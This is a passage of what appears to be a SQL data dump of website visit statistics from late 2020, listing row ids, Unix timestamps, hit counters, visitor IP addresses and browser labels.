91.196.178.97','chrome'),(543655,1603992493,1,1,0,0,'94.153.78.147','chrome'),(543656,1603992495,1,1,0,0,'91.196.178.38','chrome'),(543657,1603992555,1,1,0,0,'91.196.178.10','chrome'),(543658,1603992570,1,1,0,0,'91.196.178.35','chrome'),(543659,1603992582,1,1,0,0,'91.196.178.171','chrome'),(543660,1603992600,1,1,0,0,'91.196.178.164','chrome'),(543661,1603992637,1,1,0,0,'91.196.178.174','chrome'),(543662,1603992640,1,1,0,0,'94.153.81.175','chrome'),(543663,1603992673,1,1,0,0,'91.196.178.144','chrome'),(543664,1603992680,1,1,0,0,'31.13.127.13','other'),(543665,1603992689,1,1,0,0,'91.196.178.83','chrome'),(543666,1603992704,1,1,0,0,'37.52.22.24','chrome'),(543667,1603992742,1,1,0,0,'173.252.127.1','other'),(543668,1603992763,1,1,0,0,'46.201.113.206','chrome'),(543669,1603992767,1,1,0,0,'91.196.178.87','chrome'),(543670,1603992812,1,1,0,0,'88.155.183.121','chrome'),(543671,1603992833,1,1,0,0,'91.196.178.179','chrome'),(543672,1603992836,1,1,0,0,'91.196.178.4','other'),(543673,1603992843,1,1,0,0,'91.196.178.89','chrome'),(543674,1603992872,1,1,0,0,'46.211.56.216','chrome'),(543675,1603992884,1,1,0,0,'85.70.71.234','chrome'),(543676,1603992960,1,1,0,0,'91.196.178.180','chrome'),(543677,1603992975,1,1,0,0,'178.133.121.9','chrome'),(543678,1603992988,1,1,0,0,'91.124.183.98','chrome'),(543679,1603993016,1,1,0,0,'185.237.217.29','chrome'),(543680,1603993063,1,1,0,0,'46.211.24.38','chrome'),(543681,1603993078,1,1,0,0,'91.196.178.46','chrome'),(543682,1603993095,2,2,0,0,'91.196.178.21','chrome'),(543683,1603993120,1,1,0,0,'94.153.75.240','chrome'),(543684,1603993121,1,1,0,0,'31.13.127.111','other'),(543685,1603993146,1,1,0,0,'95.132.13.83','chrome'),(543686,1603993177,1,1,0,0,'91.196.178.23','chrome'),(543687,1603993179,1,1,0,0,'95.134.203.36','chrome'),(543688,1603993186,1,1,0,0,'46.211.24.86','chrome'),(543689,1603993221,1,1,0,0,'46.211.53.111','other'),(543690,1603993243,1,1,0,0,'91.196.178.16','chrome'),(543691,1603993253,1,1,0,0,'46.211.60.171','chrome'),(543692,1603993298,1,1,0,0,'37.73.9.54','chrome'),(543693,1603993305,1,1,0,0,'88.155.12.0','chrome'),(543694,1603993313,1,1,0,0,'91.196.178.149','chrome'),(543695,1603993330,1,1,0,0,'94.178.7.43','chrome'),(543696,1603993332,1,1,0,0,'91.196.178.183','chrome'),(543697,1603993355,1,1,0,0,'91.196.178.133','chrome'),(543698,1603993365,1,1,0,0,'185.237.217.8','chrome'),(543699,1603993382,1,1,0,0,'91.196.178.177','chrome'),(543700,1603993438,1,1,0,0,'91.196.178.39','chrome'),(543701,1603993488,1,1,0,0,'91.196.178.53','chrome'),(543702,1603993502,1,1,0,0,'185.18.52.195','other'),(543703,1603993509,1,1,0,0,'37.73.171.175','chrome'),(543704,1603993529,1,1,0,0,'46.133.33.47','chrome'),(543705,1603993552,1,1,0,0,'46.219.205.74','chrome'),(543706,1603993571,1,1,0,0,'66.220.149.37','other'),(543707,1603993584,1,1,0,0,'178.133.60.45','chrome'),(543708,1603993587,1,1,0,0,'91.196.178.86','chrome'),(543709,1603993595,1,1,0,0,'94.178.147.145','chrome'),(543710,1603993596,1,1,0,0,'46.211.18.178','chrome'),(543711,1603993598,1,1,0,0,'95.135.91.8','chrome'),(543712,1603993601,2,2,0,0,'66.220.149.32','other'),(543713,1603993602,1,1,0,0,'89.176.122.61','other'),(543714,1603993605,1,1,0,0,'37.73.97.163','chrome'),(543715,1603993619,1,1,0,0,'91.196.178.188','chrome'),(543716,1603993695,1,1,0,0,'94.153.9.103','chrome'),(543717,1603993759,1,1,0,0,'91.210.251.64','chrome'),(543718,1603993775,1,1,0,0,'91.196.178.119','chrome'),(543719,1603993799,1,1,0,0,'176.37.126.41','chrome'),(543720,1603993822,1,1,0,0,'91.196.178.73','chrome'),(543721,1603993870,1,1,0,0,'91.196.178.47','chrome'),(543722,1603993903,1,1,0,0,'92.112.125.210','other'),(543723,1603993930,1,1,0,0,'91.196.178.19','other'),(543724,1603993931,1,1,0,0,'91.196.178.1','other'),(543725,1603993946,1,1,0,0,'95.164.57.223','chrome'),(543726,1603993977,1,1,0,0,'185.237.217.15','chrome'),(543728,1603993978,1,1,0,0,'91.196.178.60','chrome'),(543729,1603994011,1,1,0,0,'91.196.178.156','chrome'),(543730,1603994073,1,1,0,0,'91.196.178.168','chrome'),(543731,1603994158,1,1,0,0,'88.155.165.127','chrome'),(543732,1603994161,1,1,0,0,'37.73.185.189','chrome'),(543733,1603994211,1,1,0,0,'46.211.29.185','chrome'),(543734,1603994273,1,1,0,0,'91.196.178.144','chrome'),(543735,1603994321,1,1,0,0,'91.210.251.68','chrome'),(543736,1603994335,2,2,0,0,'91.196.178.21','chrome'),(543737,1603994488,1,1,0,0,'195.10.210.210','chrome'),(543738,1603994611,1,1,0,0,'91.196.178.133','chrome'),(543739,1603994710,1,1,0,0,'193.169.125.8','chrome'),(543740,1603994762,1,1,0,0,'37.54.20.16','chrome'),(543741,1603994768,1,1,0,0,'95.135.89.80','firefox'),(543742,1603994799,1,1,0,0,'94.153.32.54','chrome'),(543743,1603994828,1,1,0,0,'95.134.117.171','chrome'),(543744,1603994930,1,1,0,0,'91.196.177.151','chrome'),(543745,1603994968,1,1,0,0,'46.211.61.102','chrome'),(543746,1603994975,1,1,0,0,'91.196.178.172','chrome'),(543747,1603994993,1,1,0,0,'5.173.58.156','chrome'),(543748,1603995073,1,1,0,0,'185.237.217.14','chrome'),(543749,1603995075,1,1,0,0,'91.196.178.45','chrome'),(543750,1603995081,1,1,0,0,'46.151.80.78','other'),(543751,1603995129,1,1,0,0,'91.196.178.39','chrome'),(543752,1603995254,1,1,0,0,'91.196.178.178','chrome'),(543753,1603995373,1,1,0,0,'88.155.68.60','other'),(543754,1603995374,1,1,0,0,'46.133.17.131','chrome'),(543755,1603995414,1,1,0,0,'88.155.18.200','chrome'),(543756,1603995475,1,1,0,0,'46.211.57.119','chrome'),(543757,1603995482,1,1,0,0,'91.196.178.150','chrome'),(543758,1603995565,1,1,0,0,'88.155.41.48','chrome'),(543759,1603995606,1,1,0,0,'95.135.91.188','chrome'),(543760,1603995611,1,1,0,0,'37.53.231.68','chrome'),(543761,1603995616,1,1,0,0,'91.196.178.88','chrome'),(543763,1603995618,1,1,0,0,'91.196.178.158','chrome'),(543764,1603995637,1,1,0,0,'91.196.178.61','chrome'),(543765,1603995649,1,1,0,0,'91.196.178.43','chrome'),(543766,1603995650,1,1,0,0,'173.252.83.12','other'),(543767,1603995656,1,1,0,0,'92.113.188.244','chrome'),(543768,1603995744,1,1,0,0,'94.153.79.175','chrome'),(543769,1603995759,1,1,0,0,'91.196.178.171','chrome'),(543770,1603995770,1,1,0,0,'91.196.178.130','chrome'),(543771,1603995796,1,1,0,0,'94.153.26.198','chrome'),(543772,1603995800,1,1,0,0,'91.196.178.83','chrome'),(543773,1603995819,1,1,0,0,'94.153.9.103','chrome'),(543774,1603995825,1,1,0,0,'95.134.96.69','chrome'),(543775,1603995889,1,1,0,0,'91.196.178.123','chrome'),(543776,1603995958,1,1,0,0,'91.196.178.30','chrome'),(543777,1603996040,1,1,0,0,'188.169.67.251','chrome'),(543778,1603996073,1,1,0,0,'91.196.178.122','chrome'),(543779,1603996085,1,1,0,0,'91.196.178.157','chrome'),(543780,1603996203,1,1,0,0,'91.196.178.19','chrome'),(543781,1603996273,1,1,0,0,'91.196.178.82','chrome'),(543782,1603996438,1,1,0,0,'37.188.192.250','chrome'),(543783,1603996676,1,1,0,0,'95.132.1.116','chrome'),(543784,1603996735,1,1,0,0,'46.211.60.83','chrome'),(543785,1603996943,1,1,0,0,'46.211.24.88','chrome'),(543786,1603996963,1,1,0,0,'94.179.209.59','chrome'),(543787,1603996981,1,1,0,0,'91.196.178.67','chrome'),(543788,1603997207,1,1,0,0,'185.237.217.6','chrome'),(543789,1603997254,1,1,0,0,'91.196.178.93','chrome'),(543790,1603997388,1,1,0,0,'91.196.121.135','chrome'),(543791,1603997404,1,1,0,0,'91.196.178.185','chrome'),(543792,1603997636,1,1,0,0,'91.196.178.29','chrome'),(543793,1603997640,1,1,0,0,'91.196.178.71','chrome'),(543794,1603997680,1,1,0,0,'94.153.31.162','chrome'),(543795,1603997702,1,1,0,0,'91.196.178.12','chrome'),(543796,1603997714,1,1,0,0,'88.155.153.151','other'),(543797,1603997764,1,1,0,0,'91.196.178.91','chrome'),(543798,1603997769,1,1,0,0,'46.201.174.114','chrome'),(543799,1603997787,1,1,0,0,'92.113.191.25','chrome'),(543800,1603997889,1,1,0,0,'46.211.18.51','chrome'),(543801,1603997936,1,1,0,0,'178.92.8.77','chrome'),(543802,1603997986,1,1,0,0,'91.196.177.219','other'),(543803,1603998031,1,1,0,0,'88.155.48.2','chrome'),(543804,1603998038,1,1,0,0,'147.236.145.200','chrome'),(543805,1603998090,1,1,0,0,'173.252.111.12','other'),(543806,1603998230,1,1,0,0,'46.133.49.43','chrome'),(543807,1603998332,1,1,0,0,'185.237.217.5','chrome'),(543808,1603998345,1,1,0,0,'91.196.178.135','chrome'),(543809,1603998441,1,1,0,0,'91.196.178.169','chrome'),(543810,1603998556,1,1,0,0,'188.58.52.202','other'),(543811,1603998635,1,1,0,0,'91.196.178.83','chrome'),(543812,1603998677,1,1,0,0,'91.196.178.177','chrome'),(543813,1603998750,1,1,0,0,'46.211.16.38','chrome'),(543814,1603998801,1,1,0,0,'91.196.178.86','chrome'),(543816,1603998887,1,1,0,0,'178.92.73.54','chrome'),(543817,1603998958,1,1,0,0,'109.227.92.174','chrome'),(543818,1603998959,1,1,0,0,'91.196.178.40','chrome'),(543819,1603999066,1,1,0,0,'185.237.217.15','chrome'),(543820,1603999315,1,1,0,0,'178.92.84.179','chrome'),(543821,1603999357,1,1,0,0,'91.196.178.97','other'),(543822,1603999511,1,1,0,0,'91.196.178.153','other'),(543823,1603999519,1,1,0,0,'95.134.203.36','chrome'),(543824,1603999795,1,1,0,0,'178.92.85.5','chrome'),(543825,1603999827,1,1,0,0,'91.196.178.102','chrome'),(543826,1603999860,1,1,0,0,'91.196.178.110','chrome'),(543827,1603999892,1,1,0,0,'128.124.196.123','chrome'),(543828,1604000009,1,1,0,0,'95.132.33.181','chrome'),(543829,1604000136,1,1,0,0,'91.196.178.23','chrome'),(543830,1604000275,1,1,0,0,'79.110.128.213','other'),(543831,1604000329,1,1,0,0,'91.196.178.7','chrome'),(543832,1604000341,1,1,0,0,'91.196.178.153','chrome'),(543833,1604000423,1,1,0,0,'46.211.52.186','other'),(543834,1604000575,1,1,0,0,'91.196.178.124','chrome'),(543835,1604000696,1,1,0,0,'185.237.217.16','chrome'),(543836,1604000737,1,1,0,0,'91.196.178.82','chrome'),(543837,1604000779,1,1,0,0,'91.196.178.77','chrome'),(543838,1604000963,1,1,0,0,'46.201.174.138','chrome'),(543839,1604001072,1,1,0,0,'159.224.216.39','other'),(543840,1604001295,1,1,0,0,'185.237.217.23','chrome'),(543841,1604001333,1,1,0,0,'37.73.179.202','chrome'),(543842,1604001549,1,1,0,0,'91.196.178.43','chrome'),(543843,1604001660,1,1,0,0,'91.196.178.162','chrome'),(543844,1604001950,1,1,0,0,'91.196.177.163','chrome'),(543845,1604002176,1,1,0,0,'91.196.178.81','other'),(543846,1604002177,1,1,0,0,'109.118.70.108','other'),(543847,1604002297,1,1,0,0,'91.196.178.116','chrome'),(543848,1604002379,1,1,0,0,'80.89.79.213','chrome'),(543849,1604002455,1,1,0,0,'37.73.84.121','chrome'),(543850,1604002543,1,1,0,0,'91.196.178.20','chrome'),(543851,1604002583,1,1,0,0,'91.196.178.41','chrome'),(543852,1604002696,1,1,0,0,'46.211.29.48','chrome'),(543853,1604002752,1,1,0,0,'94.179.247.119','chrome'),(543854,1604003003,1,1,0,0,'178.133.161.181','other'),(543855,1604003107,1,1,0,0,'91.196.178.131','other'),(543856,1604003489,1,1,0,0,'91.196.178.90','chrome'),(543857,1604003700,1,1,0,0,'188.163.32.24','chrome'),(543858,1604003714,1,1,0,0,'94.179.247.119','chrome'),(543859,1604003753,1,1,0,0,'91.196.178.176','chrome'),(543860,1604003837,1,1,0,0,'34.254.44.235','other'),(543861,1604003952,1,1,0,0,'46.211.20.13','chrome'),(543862,1604003954,1,1,0,0,'88.155.15.102','chrome'),(543863,1604003958,1,1,0,0,'91.196.178.124','chrome'),(543864,1604003976,1,1,0,0,'66.220.149.20','other'),(543865,1604004079,1,1,0,0,'128.124.100.92','chrome'),(543866,1604004112,1,1,0,0,'178.133.80.83','chrome'),(543867,1604004228,1,1,0,0,'91.196.178.61','other'),(543868,1604004637,1,1,0,0,'78.111.186.114','chrome'),(543869,1604004638,1,1,0,0,'91.196.178.21','chrome'),(543870,1604004708,1,1,0,0,'91.196.178.10','chrome'),(543871,1604005133,1,1,0,0,'46.211.26.199','chrome'),(543872,1604005279,1,1,0,0,'185.237.217.6','chrome'),(543873,1604005329,1,1,0,0,'37.73.96.52','chrome'),(543874,1604005376,1,1,0,0,'217.66.157.63','chrome'),(543875,1604005552,1,1,0,0,'66.220.149.21','other'),(543876,1604005558,1,1,0,0,'46.133.73.112','chrome'),(543877,1604005591,2,2,0,0,'91.196.178.21','chrome'),(543878,1604005877,1,1,0,0,'69.171.251.14','other'),(543879,1604005932,1,1,0,0,'173.252.95.120','other'),(543880,1604005933,1,1,0,0,'173.252.95.25','other'),(543881,1604005960,1,1,0,0,'91.196.178.172','chrome'),(543882,1604006421,1,1,0,0,'37.73.9.54','chrome'),(543883,1604006618,1,1,0,0,'173.252.87.14','other'),(543884,1604006751,1,1,0,0,'193.169.125.3','chrome'),(543885,1604006990,1,1,0,0,'91.196.178.173','chrome'),(543886,1604007299,1,1,0,0,'46.133.41.241','chrome'),(543887,1604007446,1,1,0,0,'91.196.178.54','other'),(543888,1604007549,1,1,0,0,'95.133.153.251','chrome'),(543889,1604007613,1,1,0,0,'37.55.238.143','chrome'),(543890,1604008089,1,1,0,0,'91.196.178.7','chrome'),(543891,1604009065,1,1,0,0,'94.244.135.118','chrome'),(543892,1604009137,1,1,0,0,'91.196.177.154','other'),(543893,1604009515,1,1,0,0,'91.196.178.137','chrome'),(543894,1604010082,1,1,0,0,'95.158.42.2','chrome'),(543895,1604010158,1,1,0,0,'91.196.178.143','chrome'),(543896,1604010189,1,1,0,0,'173.252.95.118','other'),(543897,1604011380,1,1,0,0,'178.95.156.163','other'),(543898,1604011537,1,1,0,0,'185.237.217.11','chrome'),(543899,1604012413,1,1,0,0,'91.196.178.58','chrome'),(543900,1604012911,1,1,0,0,'91.196.178.65','chrome'),(543901,1604013919,1,1,0,0,'178.93.137.188','chrome'),(543902,1604015335,1,1,0,0,'91.196.178.76','chrome'),(543903,1604017558,1,1,0,0,'109.70.106.130','other'),(543904,1604017918,1,1,0,0,'37.55.226.145','chrome'),(543905,1604018874,1,1,0,0,'37.115.112.48','chrome'),(543906,1604018901,1,0,1,0,'66.249.66.92',''),(543907,1604020166,1,1,0,0,'91.196.178.112','other'),(543908,1604021359,1,1,0,0,'95.134.168.68','chrome'),(543909,1604022885,1,1,0,0,'146.0.82.36','other'),(543910,1604023942,1,1,0,0,'130.180.218.190','chrome'),(543911,1604025101,1,1,0,0,'31.13.127.22','other'),(543912,1604027008,1,1,0,0,'91.196.178.28','chrome'),(543913,1604028340,1,1,0,0,'128.124.45.88','chrome'),(543914,1604028560,1,1,0,0,'130.180.220.197','chrome'),(543915,1604028818,1,1,0,0,'88.155.28.153','chrome'),(543916,1604028925,1,1,0,0,'46.211.32.126','chrome'),(543917,1604029531,1,1,0,0,'94.153.2.216','chrome'),(543918,1604030380,1,1,0,0,'66.220.149.20','other'),(543919,1604030403,1,1,0,0,'93.76.230.36','other'),(543920,1604031243,1,1,0,0,'84.143.158.167','chrome'),(543921,1604033244,1,1,0,0,'94.153.68.206','chrome'),(543922,1604033739,1,1,0,0,'173.252.111.7','other'),(543923,1604034842,1,1,0,0,'91.196.178.39','chrome'),(543924,1604035937,1,1,0,0,'213.110.154.232','chrome'),(543925,1604035984,1,1,0,0,'31.13.103.111','other'),(543926,1604035985,1,1,0,0,'31.13.103.10','other'),(543927,1604036001,1,1,0,0,'173.252.95.15','other'),(543928,1604036146,1,1,0,0,'94.45.153.1','chrome'),(543929,1604036466,1,1,0,0,'66.220.149.28','other'),(543930,1604036808,1,1,0,0,'94.153.24.29','chrome'),(543931,1604037031,1,1,0,0,'173.252.83.19','other'),(543932,1604039349,1,1,0,0,'69.171.251.8','other'),(543933,1604039578,1,1,0,0,'84.78.248.116','chrome'),(543934,1604039772,1,1,0,0,'185.204.24.6','other'),(543935,1604040834,1,1,0,0,'91.196.178.97','other'),(543936,1604040948,1,1,0,0,'91.196.178.68','chrome'),(543937,1604041563,1,1,0,0,'46.211.10.54','chrome'),(543938,1604041921,1,1,0,0,'91.196.178.89','chrome'),(543939,1604042371,1,1,0,0,'95.158.32.201','chrome'),(543940,1604042395,1,1,0,0,'94.153.8.229','chrome'),(543941,1604042570,1,1,0,0,'91.196.178.21','chrome'),(543942,1604043053,1,1,0,0,'94.153.72.72','chrome'),(543943,1604043079,1,1,0,0,'5.24.119.96','other'),(543944,1604043303,1,1,0,0,'91.196.178.47','chrome'),(543945,1604043588,1,1,0,0,'91.196.177.193','chrome'),(543946,1604043859,1,1,0,0,'94.153.27.14','chrome'),(543947,1604044013,1,1,0,0,'46.133.161.216','other'),(543948,1604044440,1,1,0,0,'82.193.115.183','chrome'),(543949,1604045222,1,1,0,0,'173.252.111.15','other'),(543950,1604045388,1,1,0,0,'94.153.51.69','chrome'),(543951,1604045559,1,1,0,0,'94.153.79.169','chrome'),(543952,1604045768,1,1,0,0,'185.237.217.9','chrome'),(543953,1604046076,1,1,0,0,'91.196.178.150','chrome'),(543954,1604046190,1,1,0,0,'94.153.71.107','chrome'),(543955,1604046741,1,1,0,0,'46.133.96.52','chrome'),(543956,1604049832,1,1,0,0,'37.73.87.203','chrome'),(543957,1604050138,1,1,0,0,'91.196.178.154','chrome'),(543958,1604050742,1,1,0,0,'173.252.127.10','other'),(543959,1604052004,1,1,0,0,'185.237.217.9','chrome'),(543960,1604055322,1,1,0,0,'46.211.68.131','chrome'),(543961,1604055513,1,1,0,0,'95.134.116.233','chrome'),(543962,1604059179,1,1,0,0,'185.237.217.15','chrome'),(543963,1604061740,1,1,0,0,'66.220.149.18','other'),(543964,1604062132,1,1,0,0,'37.73.194.150','chrome'),(543965,1604062192,1,1,0,0,'91.196.178.21','chrome'),(543966,1604062218,1,1,0,0,'69.171.251.6','other'),(543968,1604063317,1,1,0,0,'128.124.160.86','chrome'),(543969,1604065344,1,1,0,0,'91.196.178.21','chrome'),(543970,1604065713,1,1,0,0,'188.247.106.198','chrome'),(543971,1604066190,1,1,0,0,'91.196.178.186','chrome'),(543972,1604066666,1,1,0,0,'91.196.178.60','chrome'),(543973,1604069743,1,1,0,0,'46.211.18.141','chrome'),(543974,1604070380,1,1,0,0,'185.237.217.22','chrome'),(543975,1604072658,1,1,0,0,'91.196.178.81','chrome'),(543976,1604072877,1,1,0,0,'94.153.71.216','other'),(543977,1604073001,1,1,0,0,'88.155.87.174','other'),(543978,1604073798,1,1,0,0,'195.10.210.70','chrome'),(543979,1604073959,1,1,0,0,'37.73.190.48','chrome'),(543980,1604074614,1,1,0,0,'178.165.128.202','chrome'),(543981,1604075331,1,1,0,0,'178.133.17.225','chrome'),(543982,1604075662,1,1,0,0,'178.92.8.134','chrome'),(543983,1604075704,1,1,0,0,'91.196.178.164','chrome'),(543984,1604076655,1,1,0,0,'185.237.217.10','chrome'),(543985,1604077226,1,1,0,0,'37.73.187.141','other'),(543986,1604077258,1,1,0,0,'66.220.149.117','other'),(543987,1604077499,1,1,0,0,'173.252.83.117','other'),(543988,1604079333,1,1,0,0,'91.196.178.102','chrome'),(543989,1604080194,1,1,0,0,'78.9.185.55','other'),(543990,1604081340,1,1,0,0,'66.220.149.41','other'),(543991,1604082907,1,1,0,0,'91.196.178.113','chrome'),(543992,1604084197,1,1,0,0,'173.252.79.112','other'),(543993,1604090172,1,1,0,0,'91.196.178.163','chrome'),(543994,1604091153,1,1,0,0,'91.196.178.93','chrome'),(543995,1604091843,1,1,0,0,'66.220.149.33','other'),(543996,1604095025,1,1,0,0,'91.196.121.135','chrome'),(543997,1604095754,1,1,0,0,'109.86.48.165','other'),(543998,1604100804,2,2,0,0,'91.196.178.180','chrome'),(543999,1604105460,1,0,1,0,'66.249.66.91',''),(544000,1604107424,1,0,1,0,'66.249.66.91',''),(544001,1604116281,1,1,0,0,'91.196.178.3','chrome'),(544002,1604135401,1,1,0,0,'188.239.48.57','chrome'),(544003,1604135605,1,1,0,0,'94.153.72.248','chrome'),(544004,1604136179,1,1,0,0,'91.196.178.146','chrome'),(544005,1604140078,1,1,0,0,'91.196.178.85','chrome'),(544006,1604142713,2,2,0,0,'91.196.178.21','chrome'),(544007,1604142938,1,1,0,0,'31.13.127.7','other'),(544008,1604142939,1,1,0,0,'31.13.127.15','other'),(544010,1604142940,1,1,0,0,'31.13.127.24','other'),(544011,1604142941,1,1,0,0,'31.13.127.111','other'),(544012,1604142944,1,1,0,0,'31.13.127.21','other'),(544013,1604142945,1,1,0,0,'31.13.127.10','other'),(544016,1604142947,1,1,0,0,'31.13.127.14','other'),(544017,1604142949,1,1,0,0,'31.13.127.3','other'),(544018,1604142976,1,1,0,0,'69.171.251.4','other'),(544019,1604143098,1,1,0,0,'193.108.51.254','other'),(544020,1604143103,1,1,0,0,'91.196.178.65','chrome'),(544021,1604143112,1,1,0,0,'178.95.246.162','chrome'),(544022,1604143174,1,1,0,0,'91.196.178.189','chrome'),(544023,1604143192,1,1,0,0,'185.237.217.7','chrome'),(544024,1604143196,1,1,0,0,'94.153.20.242','chrome'),(544025,1604143240,1,1,0,0,'178.95.157.133','chrome'),(544026,1604143249,1,1,0,0,'128.124.69.59','chrome'),(544027,1604143283,1,1,0,0,'178.133.36.105','chrome'),(544028,1604143384,1,1,0,0,'31.13.127.119','other'),(544029,1604143464,1,1,0,0,'91.196.178.170','chrome'),(544030,1604143574,1,1,0,0,'91.196.178.80','chrome'),(544031,1604143620,1,1,0,0,'185.237.217.2','chrome'),(544032,1604143635,1,1,0,0,'91.196.178.174','chrome'),(544033,1604143731,1,1,0,0,'91.196.178.21','chrome'),(544034,1604143901,1,1,0,0,'37.55.224.239','chrome'),(544035,1604144039,1,1,0,0,'217.254.208.81','chrome'),(544036,1604144046,1,1,0,0,'46.201.174.138','chrome'),(544037,1604144132,1,1,0,0,'91.196.178.156','chrome'),(544038,1604144156,1,1,0,0,'91.196.178.10','chrome'),(544039,1604144173,1,1,0,0,'91.196.178.149','chrome'),(544040,1604144257,1,1,0,0,'185.237.217.30','chrome'),(544041,1604144323,1,1,0,0,'91.124.182.54','chrome'),(544042,1604144530,1,1,0,0,'91.196.178.5','chrome'),(544043,1604144618,1,1,0,0,'91.196.178.28','chrome'),(544044,1604144627,1,1,0,0,'46.133.196.107','other'),(544045,1604144710,1,1,0,0,'91.196.178.41','chrome'),(544046,1604144749,1,1,0,0,'91.196.178.89','chrome'),(544047,1604144773,1,1,0,0,'94.153.27.123','chrome'),(544048,1604144845,1,1,0,0,'94.153.80.149','chrome'),(544049,1604144861,1,1,0,0,'66.220.149.9','other'),(544050,1604145310,1,1,0,0,'91.196.178.174','chrome'),(544051,1604145348,1,1,0,0,'188.163.19.91','chrome'),(544052,1604145353,1,1,0,0,'91.196.178.21','chrome'),(544053,1604145384,1,1,0,0,'91.196.178.137','chrome'),(544054,1604145633,1,1,0,0,'95.132.25.56','chrome'),(544055,1604146062,1,1,0,0,'95.135.90.9','chrome'),(544056,1604146564,1,1,0,0,'46.211.17.78','chrome'),(544057,1604146621,1,1,0,0,'173.252.127.8','other'),(544058,1604146624,1,1,0,0,'173.252.95.21','other'),(544059,1604146695,1,1,0,0,'91.196.178.48','chrome'),(544060,1604146851,1,1,0,0,'91.196.178.53','chrome'),(544061,1604146876,1,1,0,0,'91.196.178.142','other'),(544062,1604147272,1,1,0,0,'95.134.220.65','other'),(544063,1604147690,1,1,0,0,'91.196.178.78','chrome'),(544064,1604147733,1,1,0,0,'91.196.178.21','chrome'),(544065,1604147965,1,1,0,0,'128.124.205.96','chrome'),(544066,1604148184,1,1,0,0,'37.73.64.50','chrome'),(544067,1604148215,1,1,0,0,'185.237.217.25','chrome'),(544068,1604148495,1,1,0,0,'91.196.178.1','chrome'),(544069,1604148703,1,1,0,0,'46.211.59.174','chrome'),(544070,1604149322,1,1,0,0,'46.211.47.186','chrome'),(544071,1604149570,1,1,0,0,'91.196.178.144','chrome'),(544072,1604150267,1,1,0,0,'52.30.100.235','other'),(544073,1604150284,1,1,0,0,'78.27.145.20','chrome'),(544074,1604150432,1,1,0,0,'46.211.29.2','chrome'),(544075,1604150673,1,1,0,0,'95.134.203.36','chrome'),(544076,1604150823,1,1,0,0,'91.196.178.55','chrome'),(544077,1604151060,1,1,0,0,'91.196.178.21','chrome'),(544078,1604151247,1,1,0,0,'91.196.178.82','chrome'),(544079,1604151262,1,1,0,0,'31.13.127.116','other'),(544080,1604151275,1,1,0,0,'37.53.231.68','chrome'),(544081,1604151277,1,1,0,0,'31.13.115.23','other'),(544082,1604151481,1,1,0,0,'88.155.28.136','chrome'),(544083,1604151807,1,1,0,0,'91.196.178.180','chrome'),(544084,1604152332,1,1,0,0,'95.133.193.139','chrome'),(544085,1604152367,1,1,0,0,'185.237.217.6','chrome'),(544086,1604152465,1,1,0,0,'95.132.38.82','chrome'),(544087,1604152678,1,1,0,0,'213.174.2.43','chrome'),(544088,1604152703,1,1,0,0,'178.133.9.116','chrome'),(544089,1604152819,1,1,0,0,'173.252.87.8','other'),(544090,1604152821,1,1,0,0,'66.220.149.30','other'),(544092,1604152976,1,1,0,0,'46.211.71.171','chrome'),(544093,1604153260,1,1,0,0,'31.13.115.118','other'),(544094,1604153861,1,1,0,0,'91.196.178.173','chrome'),(544095,1604154887,1,1,0,0,'91.196.178.123','chrome'),(544096,1604155099,1,1,0,0,'91.196.178.21','chrome'),(544097,1604155403,1,1,0,0,'91.196.178.29','chrome'),(544098,1604155481,1,1,0,0,'80.89.76.194','chrome'),(544099,1604155686,1,1,0,0,'91.196.178.183','chrome'),(544100,1604156072,1,1,0,0,'91.196.178.40','chrome'),(544101,1604156179,1,1,0,0,'91.196.178.150','chrome'),(544102,1604157023,1,1,0,0,'91.124.182.137','chrome'),(544103,1604157167,1,1,0,0,'91.196.178.181','chrome'),(544104,1604157394,1,1,0,0,'185.237.217.12','chrome'),(544105,1604157554,1,1,0,0,'91.196.178.155','other'),(544106,1604157902,1,1,0,0,'91.196.178.21','chrome'),(544107,1604158143,1,1,0,0,'91.196.177.163','chrome'),(544108,1604158155,1,1,0,0,'95.134.220.65','other'),(544109,1604158514,1,1,0,0,'188.163.19.115','chrome'),(544110,1604158590,1,1,0,0,'91.196.178.46','chrome'),(544111,1604159159,1,1,0,0,'178.133.36.159','chrome'),(544112,1604159249,1,1,0,0,'91.196.178.179','other'),(544113,1604159250,2,2,0,0,'130.180.219.146','chrome'),(544114,1604159279,1,1,0,0,'91.196.178.29','chrome'),(544115,1604159282,1,1,0,0,'185.237.217.23','chrome'),(544116,1604159749,1,1,0,0,'91.196.178.89','chrome'),(544117,1604160626,1,1,0,0,'91.196.178.136','other'),(544118,1604162108,1,1,0,0,'31.13.127.111','other'),(544119,1604162408,1,1,0,0,'185.237.217.28','chrome'),(544120,1604162471,1,1,0,0,'91.196.178.89','chrome'),(544121,1604163766,1,1,0,0,'31.13.127.8','other'),(544122,1604164262,1,1,0,0,'91.196.178.104','chrome'),(544123,1604164340,2,2,0,0,'31.13.127.1','other'),(544126,1604164341,1,1,0,0,'31.13.127.10','other'),(544129,1604164484,1,1,0,0,'91.196.177.69','chrome'),(544130,1604165446,1,1,0,0,'185.237.217.17','chrome'),(544131,1604165579,1,1,0,0,'94.153.28.197','chrome'),(544132,1604166103,1,1,0,0,'173.252.95.11','other'),(544133,1604166778,1,1,0,0,'91.196.178.115','chrome'),(544134,1604167611,1,1,0,0,'178.92.8.31','chrome'),(544135,1604168673,1,1,0,0,'91.196.178.165','chrome'),(544136,1604168691,1,1,0,0,'92.113.191.25','chrome'),(544137,1604169404,1,1,0,0,'91.196.178.104','chrome'),(544138,1604169617,1,1,0,0,'91.196.178.46','other'),(544139,1604170509,1,1,0,0,'92.113.174.84','chrome'),(544140,1604171068,1,1,0,0,'66.220.149.28','other'),(544141,1604173071,1,1,0,0,'91.196.178.21','chrome'),(544142,1604173385,1,1,0,0,'91.196.178.76','chrome'),(544143,1604173482,1,1,0,0,'173.252.127.5','other'),(544144,1604173987,1,1,0,0,'173.252.95.117','other'),(544145,1604174386,1,1,0,0,'37.73.108.76','chrome'),(544146,1604174408,1,1,0,0,'185.237.217.14','chrome'),(544147,1604174519,1,1,0,0,'94.179.247.175','chrome'),(544148,1604176807,1,1,0,0,'185.237.217.25','chrome'),(544149,1604176827,1,1,0,0,'173.252.95.113','other'),(544150,1604179099,1,1,0,0,'91.196.178.8','chrome'),(544151,1604181957,1,1,0,0,'31.13.127.23','other'),(544152,1604184127,1,1,0,0,'91.196.178.59','chrome'),(544153,1604190235,1,1,0,0,'66.249.66.92','chrome'),(544154,1604191692,1,0,1,0,'66.249.66.93',''),(544155,1604194145,1,0,1,0,'66.249.66.93',''),(544156,1604194651,1,1,0,0,'185.237.217.26','chrome'),(544157,1604196888,1,1,0,0,'88.155.158.236','chrome')